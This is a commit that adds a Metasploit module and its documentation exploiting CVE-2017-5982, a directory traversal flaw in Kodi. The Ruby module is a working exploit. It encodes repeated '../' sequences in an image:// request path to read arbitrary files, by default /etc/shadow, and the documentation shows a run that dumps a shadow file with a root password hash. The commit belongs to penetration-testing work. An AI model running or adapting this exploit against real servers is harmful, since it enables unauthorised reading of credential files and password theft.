Add a sploit for CVE-2017-5982

jvoisin · jvoisin · commit 7bd6aff1cf9b · 2017-02-19T21:57:27.000+01:00
diff --git a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md
@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.
+
+**Vulnerable Application Installation Steps**
+
+Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
+you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
+
+You'll need a version lower than 17.1.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+```
+msf > use auxiliary/scanner/http/kodi_traversal
+msf auxiliary(kodi_traversal) > set RPORT 8080
+RPORT => 8080
+msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
+RHOSTS => 192.168.0.31
+msf auxiliary(kodi_traversal) > run
+
+[*] Reading '/etc/shadow'
+[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+
+systemd-network:*:::::::
+root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
+nobody:*:::::::
+dbus:*:::::::
+system:*:::::::
+sshd:*:::::::
+avahi:*:::::::
+msf auxiliary(kodi_traversal) > info 
+
+```
diff --git a/modules/auxiliary/scanner/http/kodi_traversal.rb b/modules/auxiliary/scanner/http/kodi_traversal.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kodi 17.1 Local File Inclusion Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal flaw found in Kodi 17.1.
+      },
+      'References'     =>
+        [
+          ['CVE', '2017-5982'],
+        ],
+      'Author'         =>
+        [
+          'Eric Flokstra',  #Original
+          'jvoisin'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Feb 12 2017"
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+        OptString.new('FILE',      [true, 'The file to obtain', '/etc/shadow']),
+        OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
+      ], self.class)
+  end
+
+
+  def run_host(ip)
+    base = normalize_uri(target_uri.path)
+
+    peer = "#{ip}:#{rport}"
+
+    print_status("Reading '#{datastore['FILE']}'")
+
+    traverse = '../' * datastore['DEPTH']
+    f = datastore['FILE']
+    f = f[1, f.length] if f =~ /^\//
+    f = "image/image://" + Rex::Text.uri_encode(traverse + f, "hex-all")
+
+    uri = normalize_uri(base, Rex::Text.uri_encode(f, "hex-all"))
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    if res and res.code != 200
+      print_error("Unable to read '#{datastore['FILE']}', possibily because:")
+      print_error("\t1. File does not exist.")
+      print_error("\t2. No permission.")
+
+    elsif res and res.code == 200
+      data = res.body.lstrip
+      fname = datastore['FILE']
+      p = store_loot(
+        'kodi',
+        'application/octet-stream',
+        ip,
+        data,
+        fname
+      )
+
+      vprint_line(data)
+      print_good("#{fname} stored as '#{p}'")
+
+    else
+      print_error("Fail to obtain file for some unknown reason")
+    end
+  end
+
+end
